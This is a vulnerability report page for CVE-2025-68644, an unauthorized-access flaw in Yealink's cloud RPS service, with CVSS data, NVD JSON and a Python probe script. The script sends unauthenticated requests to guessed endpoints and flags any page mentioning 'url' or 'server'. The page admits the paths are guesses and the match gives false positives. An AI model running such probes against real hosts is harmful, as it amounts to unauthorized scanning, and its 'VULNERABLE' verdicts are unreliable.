Security Vulnerability Report
CVE-2025-68644 CVSS 7.4 HIGH

Published: 2025-12-21 04:16:05
Last Modified: 2026-04-15 00:35:42

Description

Yealink RPS before 2025-06-27 allows unauthorized access to information, including AutoP URL addresses. This was fixed by deploying an enhanced authentication mechanism through a security update to all cloud instances.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
Exploitability Subscore
2.2
Impact Subscore
5.2
Weakness (CWE)
CWE-290 (Authentication Bypass by Spoofing)
NVD Status
Deferred

Configurations (Affected Products)

No CPE configuration data in the NVD record.

Yealink RPS < 2025-06-27 (all versions before this date)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that NVD tags this CVE as exclusively-hosted-service: the affected component is Yealink's cloud-hosted RPS, which the vendor reports as patched on all cloud instances, so there is no self-hosted build to test. The endpoint paths below are this page's guesses, not paths taken from the vendor bulletin, and the keyword match on the response is a loose heuristic that will produce false positives.
python
# CVE-2025-68644 PoC - Yealink RPS Unauthorized Access
# Target: Yealink RPS before 2025-06-27
import json
import sys

import requests
import urllib3

# verify=False is used below; silence the per-request TLS warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def check_cve_2025_68644(target_url):
    """
    Check if target Yealink RPS is vulnerable to CVE-2025-68644.
    This PoC probes a list of candidate endpoints without credentials and
    reports any 200 response whose body mentions AutoP/URL/server material.
    """
    # Candidate RPS API endpoints that may expose the AutoP URL.
    # These paths are guesses by this page's author, not taken from the
    # vendor bulletin; treat a hit as a lead to verify, not as proof.
    endpoints = [
        "/api/v1/autop/server",
        "/api/provisioning/autop",
        "/rps/api/config",
        "/api/v1/rps/settings",
        "/api/v1/device/config",
        "/autop/url",
        "/api/autop",
    ]

    print(f"[*] Testing {target_url} for CVE-2025-68644")
    print("[*] Target: Yealink RPS Unauthorized Access to AutoP URL")

    vulnerable = False
    for endpoint in endpoints:
        url = target_url.rstrip("/") + endpoint
        try:
            # No authentication headers: the point of the check is whether
            # the endpoint answers an unauthenticated client at all.
            response = requests.get(url, timeout=10, verify=False)
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing {url}: {e}")
            continue

        if response.status_code != 200:
            continue

        # Parse JSON when the server says it is JSON; fall back to the raw
        # text if the body is not actually valid JSON (ValueError is not a
        # RequestException, so it must be handled separately).
        if "json" in response.headers.get("content-type", "").lower():
            try:
                data = response.json()
            except ValueError:
                data = response.text
        else:
            data = response.text

        # Look for AutoP URL patterns. Deliberately loose; 'url' and
        # 'server' will match many unrelated pages.
        haystack = str(data).lower()
        if "autop" in haystack or "url" in haystack or "server" in haystack:
            print(f"[+] VULNERABLE: {url}")
            print(f"[+] Status Code: {response.status_code}")
            print(f"[+] Response: {json.dumps(data, indent=2)[:500]}")
            vulnerable = True

    if not vulnerable:
        print("[*] Target may not be vulnerable or RPS service not found")
    return vulnerable


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-68644.py <target_url>")
        print("Example: python cve-2025-68644.py https://rps.example.com")
        sys.exit(1)
    target = sys.argv[1]
    check_cve_2025_68644(target)

References

https://www.yealink.com/en/trust-center/security-bulletins/yealink-unauthorized-access-to-rps-vulnerability (Yealink security bulletin)
https://www.yealink.com/website-service/download/Yealink_RPS_Security_Remediation_Verification_Report.pdf (Yealink RPS Security Remediation Verification Report)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-68644",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-21T04:16:05.270",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [
      {"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}
    ],
    "descriptions": [
      {"lang": "en", "value": "Yealink RPS before 2025-06-27 allows unauthorized access to information, including AutoP URL addresses. This was fixed by deploying an enhanced authentication mechanism through a security update to all cloud instances."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-290"}]}
    ],
    "references": [
      {"url": "https://www.yealink.com/en/trust-center/security-bulletins/yealink-unauthorized-access-to-rps-vulnerability", "source": "[email protected]"},
      {"url": "https://www.yealink.com/website-service/download/Yealink_RPS_Security_Remediation_Verification_Report.pdf", "source": "[email protected]"}
    ]
  }
}